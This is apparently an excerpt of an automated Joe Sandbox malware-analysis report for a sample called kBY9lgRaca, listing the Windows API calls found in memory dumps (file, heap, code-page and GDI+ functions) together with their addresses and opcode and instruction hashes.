                                                                  • Instruction ID: bc1214ba770444764f1d5c60811def679016c4b1d2e0f602e40100a115debdc5
                                                                  • Opcode Fuzzy Hash: 7440ac16018d7a3083b6345e55f489a462a5d9620fc2ade2d62826fa2c846f2a
                                                                  • Instruction Fuzzy Hash: 3F01F7322003646AEF21AB758C4ABFE37CC9F0A780F044415F992E70A1DB64DB81D6B7
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CDB8B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID:
                                                                  • API String ID: 1807457897-3916222277
                                                                  • Opcode ID: f1f87df33cb6213f21237470f37fa0ec9fa63e9be6c894eb117e72678d6c97b2
                                                                  • Instruction ID: 33cd1a275ac022c9d62f9743f391d0ae9b7886fba3cecd542ef1c7d0cd1d293a
                                                                  • Opcode Fuzzy Hash: f1f87df33cb6213f21237470f37fa0ec9fa63e9be6c894eb117e72678d6c97b2
                                                                  • Instruction Fuzzy Hash: 6641D87090438CDADB218E65CC94BFABBF9DB55304F1404EEE79A86242D335AE46DB60
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00CDAFDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: String
                                                                  • String ID: LCMapStringEx
                                                                  • API String ID: 2568140703-3893581201
                                                                  • Opcode ID: 96b525e26d314229b0de2661a7709f4f239ce8df117dedb4415a7dd67c789535
                                                                  • Instruction ID: e2c41b4699cf8df8dece3dfd66a092759e3e0fba2d7a40e0786a293225a64551
                                                                  • Opcode Fuzzy Hash: 96b525e26d314229b0de2661a7709f4f239ce8df117dedb4415a7dd67c789535
                                                                  • Instruction Fuzzy Hash: F5010832504259BBCF129F91DC06EEE7F62EF08750F054255FE1466261CB369A31EB91
                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CDA56F), ref: 00CDAF55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                  • String ID: InitializeCriticalSectionEx
                                                                  • API String ID: 2593887523-3084827643
                                                                  • Opcode ID: e17f4fed02de1bda11885592f9d0e4663a8d04732411408d81059efec103547f
                                                                  • Instruction ID: b542206dd89fcf21065144db5c986f66725139ae717f35a832438cabef50896a
                                                                  • Opcode Fuzzy Hash: e17f4fed02de1bda11885592f9d0e4663a8d04732411408d81059efec103547f
                                                                  • Instruction Fuzzy Hash: 3EF0E931645258BFCF116F51DC06EAD7F61EF04711B004169FD199B361DB715E10A7C5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Alloc
                                                                  • String ID: FlsAlloc
                                                                  • API String ID: 2773662609-671089009
                                                                  • Opcode ID: 5ac4cf1bafc25093e494042be5e51ce548a2bed361adf958459a5b9068265269
                                                                  • Instruction ID: b44375ebebb6361ad2ad134a1d383beca400cc977bf91487764a0711e98639ec
                                                                  • Opcode Fuzzy Hash: 5ac4cf1bafc25093e494042be5e51ce548a2bed361adf958459a5b9068265269
                                                                  • Instruction Fuzzy Hash: 3AE055306402987BC300AB26DC06F2EBB91CF04721B0002AAFD059B341DE306F0082CA
                                                                  APIs
                                                                    • Part of subcall function 00CDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CDBA44,?), ref: 00CDB7E6
                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CDBA89,?,00000000), ref: 00CDBC64
                                                                  • GetCPInfo.KERNEL32(00000000,00CDBA89,?,?,?,00CDBA89,?,00000000), ref: 00CDBC77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CodeInfoPageValid
                                                                  • String ID:
                                                                  • API String ID: 546120528-0
                                                                  • Opcode ID: aa0512c8908e107a4aee3af7db33b923774d3efe85f6a652e4a98e0fc07609c1
                                                                  • Instruction ID: 4ba694cc31bb9da5f2f2b4f31b1d64f4055624a7fccd8efa047990c6861c0d02
                                                                  • Opcode Fuzzy Hash: aa0512c8908e107a4aee3af7db33b923774d3efe85f6a652e4a98e0fc07609c1
                                                                  • Instruction Fuzzy Hash: 27510370900345DEDB209F76C8816BBBBE6EF41300F1A446FD6A68B352DB359E469B90
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CB9A50,?,?,00000000,?,?,00CB8CBC,?), ref: 00CB9BAB
                                                                  • GetLastError.KERNEL32(?,00000000,00CB8411,-00009570,00000000,000007F3), ref: 00CB9BB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: e4a65426b15e5b587810b9dd0fc95c43162f492195600d1d90c3249d7866b0e8
                                                                  • Instruction ID: 6cf42564e670b19788713e51ec2c61457bd6d7dd8cc7f0823b21ca753da88ff4
                                                                  • Opcode Fuzzy Hash: e4a65426b15e5b587810b9dd0fc95c43162f492195600d1d90c3249d7866b0e8
                                                                  • Instruction Fuzzy Hash: 4E41D0316043418FDB34DF15E5849EAB7E9FFD5320F148A2DEAA183260D770EE458B61
                                                                  APIs
                                                                    • Part of subcall function 00CD97E5: GetLastError.KERNEL32(?,00CF1098,00CD4674,00CF1098,?,?,00CD40EF,?,?,00CF1098), ref: 00CD97E9
                                                                    • Part of subcall function 00CD97E5: _free.LIBCMT ref: 00CD981C
                                                                    • Part of subcall function 00CD97E5: SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD985D
                                                                    • Part of subcall function 00CD97E5: _abort.LIBCMT ref: 00CD9863
                                                                    • Part of subcall function 00CDBB4E: _abort.LIBCMT ref: 00CDBB80
                                                                    • Part of subcall function 00CDBB4E: _free.LIBCMT ref: 00CDBBB4
                                                                    • Part of subcall function 00CDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CDBA44,?), ref: 00CDB7E6
                                                                  • _free.LIBCMT ref: 00CDBA9F
                                                                  • _free.LIBCMT ref: 00CDBAD5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorLast_abort
                                                                  • String ID:
                                                                  • API String ID: 2991157371-0
                                                                  • Opcode ID: 9fad596ccebdfc36cb679c6e943b1f6a444c97672de2cea3814270eb1fa6e626
                                                                  • Instruction ID: 5b58ecbb5b361c35213376ffe98f0d00defa9445c291758867c1211542d4414c
                                                                  • Opcode Fuzzy Hash: 9fad596ccebdfc36cb679c6e943b1f6a444c97672de2cea3814270eb1fa6e626
                                                                  • Instruction Fuzzy Hash: 1A31B831904209EFDB10DFA9D441BADB7F5EF44320F66409BE6185B3A2EB329E45EB50
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB1E55
                                                                    • Part of subcall function 00CB3BBA: __EH_prolog.LIBCMT ref: 00CB3BBF
                                                                  • _wcslen.LIBCMT ref: 00CB1EFD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2838827086-0
                                                                  • Opcode ID: bf0b4b9e7765c6a31178876faabd3db15b69cd84027ed6af8f0f39e2ea8fb3b1
                                                                  • Instruction ID: e4d7ede413c571fb3e26a3ccc7762b3d202bde5a07230b2f3792ba5d2e4236dd
                                                                  • Opcode Fuzzy Hash: bf0b4b9e7765c6a31178876faabd3db15b69cd84027ed6af8f0f39e2ea8fb3b1
                                                                  • Instruction Fuzzy Hash: 8B314971904249AFCF11DF99C965AEEBBF6BF18300F54006EF845A7251CB329E11DB60
                                                                  APIs
                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CB73BC,?,?,?,00000000), ref: 00CB9DBC
                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CB9E70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: File$BuffersFlushTime
                                                                  • String ID:
                                                                  • API String ID: 1392018926-0
                                                                  • Opcode ID: 90f17c79820763cdbdf090749b267345aa42f648d67842e8e98f4ab343aec80c
                                                                  • Instruction ID: 055023c1826c6248081ccb7b7c70fcfbfc825a69e4ab423d4a916fad263d9bb4
                                                                  • Opcode Fuzzy Hash: 90f17c79820763cdbdf090749b267345aa42f648d67842e8e98f4ab343aec80c
                                                                  • Instruction Fuzzy Hash: C421D031248385ABC714CF36C891BABBBE8EF55304F08491DF9E587151D339EA0C9B62
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CB9F27,?,?,00CB771A), ref: 00CB96E6
                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CB9F27,?,?,00CB771A), ref: 00CB9716
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 3c49511e4f5d82ae71b1ba06a4cd76b4776427054c7b0bac38c20b2a167de2f5
                                                                  • Instruction ID: 94470a5124dec2b091dde2223c865c9ec364458fc1e55c0614ddbf9d6c322462
                                                                  • Opcode Fuzzy Hash: 3c49511e4f5d82ae71b1ba06a4cd76b4776427054c7b0bac38c20b2a167de2f5
                                                                  • Instruction Fuzzy Hash: B321D0B1100344AFE3708A65CC89FF7B7DCEB49324F100A19FAE6C61D2C7B4A9849671
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CB9EC7
                                                                  • GetLastError.KERNEL32 ref: 00CB9ED4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: cf575955e359dfe39724d2e181431e27cf9805ff1092c09d5e5d6377810eb7a8
                                                                  • Instruction ID: c5d91fb5dc8e6393a3dd720a8f2f4b13f0195282b51570c194280fd3329a3477
                                                                  • Opcode Fuzzy Hash: cf575955e359dfe39724d2e181431e27cf9805ff1092c09d5e5d6377810eb7a8
                                                                  • Instruction Fuzzy Hash: C111E530600784ABE734C679C884BF6B7E9EB45370F504A29E663D26D0D774EE45C760
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00CD8E75
                                                                    • Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38
                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00CF1098,00CB17CE,?,?,00000007,?,?,?,00CB13D6,?,00000000), ref: 00CD8EB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocAllocate_free
                                                                  • String ID:
                                                                  • API String ID: 2447670028-0
                                                                  • Opcode ID: b27e661804aa26b483129474db9e3c28eff29e10ef3c70b4c33c62dbde35bab1
                                                                  • Instruction ID: 332dd6352f5b333d685309a4af087f2a85dc5708e4a886cbf86d3fed9fa76d0b
                                                                  • Opcode Fuzzy Hash: b27e661804aa26b483129474db9e3c28eff29e10ef3c70b4c33c62dbde35bab1
                                                                  • Instruction Fuzzy Hash: AFF0C83A60111176CB217B269C05B6F77688FC1B70B544117FB2496791DF709E08A9A0
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 00CC10AB
                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CC10B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Process$AffinityCurrentMask
                                                                  • String ID:
                                                                  • API String ID: 1231390398-0
                                                                  • Opcode ID: e50945e69cbc6314696d641b90fa61ce686aecaed73813d65b7b15f33db3b0d3
                                                                  • Instruction ID: 79cd4e6ae92321b5f8d4ab46d742fb1fcc642bff93b706c9db63a4a7b31f3cb3
                                                                  • Opcode Fuzzy Hash: e50945e69cbc6314696d641b90fa61ce686aecaed73813d65b7b15f33db3b0d3
                                                                  • Instruction Fuzzy Hash: E5E09232F10185A78F098BA5DC19FAF73DDEA4524431841B9E813D7202F934EF414B60
                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA501
                                                                    • Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27
                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA532
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2673547680-0
                                                                  • Opcode ID: 05c49267526354a8a69be37eb91a1a1364ba55981f9138829e3345a49b5490d8
                                                                  • Instruction ID: 7169e90d06479385b79ec4c4fde9d2067e78e82353ede7a688ccdf0214a29c8f
                                                                  • Opcode Fuzzy Hash: 05c49267526354a8a69be37eb91a1a1364ba55981f9138829e3345a49b5490d8
                                                                  • Instruction Fuzzy Hash: E2F030322401497BDF115F60DC45FEE37ACAB04385F448051B945D6160DB71DB98EA60
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641,000000FF), ref: 00CBA1F1
                                                                    • Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27
                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641), ref: 00CBA21F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2643169976-0
                                                                  • Opcode ID: 004b668fb92c1c588c6d98c4ed1af2c90afb8e2185921a7d34903de11cfe877a
                                                                  • Instruction ID: e408d7fc17bbce9ca13219dcff27a7f2e6dea843c92f55150912eae9ed6550cc
                                                                  • Opcode Fuzzy Hash: 004b668fb92c1c588c6d98c4ed1af2c90afb8e2185921a7d34903de11cfe877a
                                                                  • Instruction Fuzzy Hash: B6E0D8311402496BEB019F60DC45FED375CAF0C3C1F484021B949D6051EB71DEC4EA55
                                                                  APIs
                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00CE2641,000000FF), ref: 00CCACB0
                                                                  • CoUninitialize.COMBASE(?,?,?,?,00CE2641,000000FF), ref: 00CCACB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
